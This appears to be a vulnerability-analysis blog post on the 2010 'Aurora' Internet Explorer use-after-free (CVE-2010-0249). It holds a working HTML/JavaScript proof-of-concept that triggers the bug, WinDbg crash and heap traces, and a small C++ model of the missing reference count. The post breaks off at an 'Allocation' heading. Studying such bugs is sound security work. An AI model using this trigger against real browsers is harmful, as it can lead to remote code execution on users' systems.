CVE-2010-0249 Aurora

Posted Ox9A82


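The legendary Aurora vulnerability

Microsoft Internet Explorer invalid event operation memory corruption vulnerability

Microsoft Internet Explorer is the web browser bundled by default with the Microsoft Windows operating system.
Microsoft Internet Explorer has a memory corruption vulnerability when handling invalid event operations. Because the corresponding reference count is not incremented after an object is created, a malicious sequence of object operations can leave a pointer referring to memory that has been freed and is then reused. A remote attacker can execute code on the user's system by luring the user to a malicious web page that performs these invalid memory operations.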

 

The PoC is as follows:

<html>          
<head>  
<script>  
var obj, event_obj;      

function ev1(evt)     
{              
    event_obj = document.createEventObject(evt);               
    document.getElementById("sp1").innerHTML = "";  
    window.setInterval(ev2, 1);           
}  
          
function ev2()
{
    var data, tmp;
    data = "";
    tmp = unescape("%u0a0a%u0a0a");
    for (var i = 0 ; i < 4 ; i++) data += tmp;
    for (i = 0 ; i < obj.length ; i++ )
    {
        obj[i].data = data;
    }
    event_obj.srcElement;
}
  
obj = new Array();  
event_obj = null;  
for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT");  
</script>  
</head>  
<body>  
    <span id="sp1">  
      <img src="aurora.gif" onload="ev1(event)">  
    </span>          
</body>  
</html>  

I could not find a suitable PoC, so this one is adapted from an exploit I found online; it is somewhat cumbersome.

 

Getting straight to the point: it is immediately apparent that the UAF occurs on a CBody object.

1:020> g
(c60.b2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0
eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:07540fc8=????????
1:020> !heap -p -a ecx
    address 07540fc8 found in
    _DPH_HEAP_ROOT @ 1b1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7db21d4:          7540000             2000
    702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77285674 ntdll!RtlDebugFreeHeap+0x0000002f
    77247aca ntdll!RtlpFreeHeap+0x0000005d
    77212d68 ntdll!RtlFreeHeap+0x00000142
    7710f1ac kernel32!HeapFree+0x00000014
    683e0fa4 mshtml!CBodyElement::`scalar deleting destructor'+0x00000022
    68387dd0 mshtml!CBase::SubRelease+0x00000022
    6837c482 mshtml!CElement::PrivateRelease+0x0000002a
    6837b034 mshtml!PlainRelease+0x00000025
    683d669d mshtml!PlainTrackerRelease+0x00000014
    6bd0a6f1 jscript!VAR::Clear+0x0000005f
    6bd26d66 jscript!GcContext::Reclaim+0x000000b6
    6bd24309 jscript!GcContext::CollectCore+0x00000123
    6bd24a4a jscript!CScriptRuntime::Run+0x000039dc
    6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6bd15bfb jscript!ScrFncObj::Call+0x0000008d
    6bd15e11 jscript!CSession::Execute+0x0000015f
    6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5
    6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c
    6bd096de jscript!NameTbl::Invoke+0x00000070
    6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087
    6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6
    68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6
    68371e57 mshtml!GlobalWndProc+0x00000183
    76c686ef USER32!InternalCallWinProc+0x00000023
    76c68876 USER32!UserCallWinProcCheckWow+0x0000014b
    76c689b5 USER32!DispatchMessageWorker+0x0000035e
    76c68e9c USER32!DispatchMessageW+0x0000000f
    6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab
    77111174 kernel32!BaseThreadInitThunk+0x0000000e
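
The missing reference count named in the advisory text, and the release chain visible in the free stack above, can be reduced to a small model. This is an added example, not code from the original post and not mshtml code: Element, EventObj, copy_event and dangling_after_tree_release are hypothetical names, and the model only records when the count reaches zero instead of freeing memory.

```cpp
#include <cstdio>
#include <memory>

// Hypothetical stand-in for a COM-style refcounted DOM element. "destroyed"
// records that the count reached zero instead of really freeing memory, so
// the model can be inspected safely.
struct Element {
    int refs = 1;            // the reference held by the document tree
    bool destroyed = false;
    void AddRef() { ++refs; }
    void Release() { if (--refs == 0) destroyed = true; }
};

// Hypothetical event record that remembers the element that raised the event.
struct EventObj {
    Element* src;
    bool owns_ref;
};

// Copying an event: the buggy form copies the raw pointer only; the fixed
// form takes its own reference on the source element.
EventObj copy_event(const EventObj& e, bool take_ref) {
    EventObj c{e.src, take_ref};
    if (take_ref && c.src) c.src->AddRef();
    return c;
}

// Returns true if the copy's src pointer would be dangling once the tree has
// dropped the element (the state page heap reports as a "free-ed allocation").
bool dangling_after_tree_release(bool take_ref) {
    auto storage = std::make_unique<Element>();  // keeps the model memory valid
    Element* elem = storage.get();
    EventObj original{elem, false};              // live event, borrowed pointer
    EventObj saved = copy_event(original, take_ref);
    elem->Release();                             // tree drops the element
    bool dangling = saved.src->destroyed;        // safe: storage still owns it
    if (saved.owns_ref && !dangling) saved.src->Release();
    return dangling;
}

int main() {
    std::printf("copy without AddRef -> dangling: %d\n", dangling_after_tree_release(false));
    std::printf("copy with AddRef    -> dangling: %d\n", dangling_after_tree_release(true));
    return 0;
}
```
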

 

Allocation

 
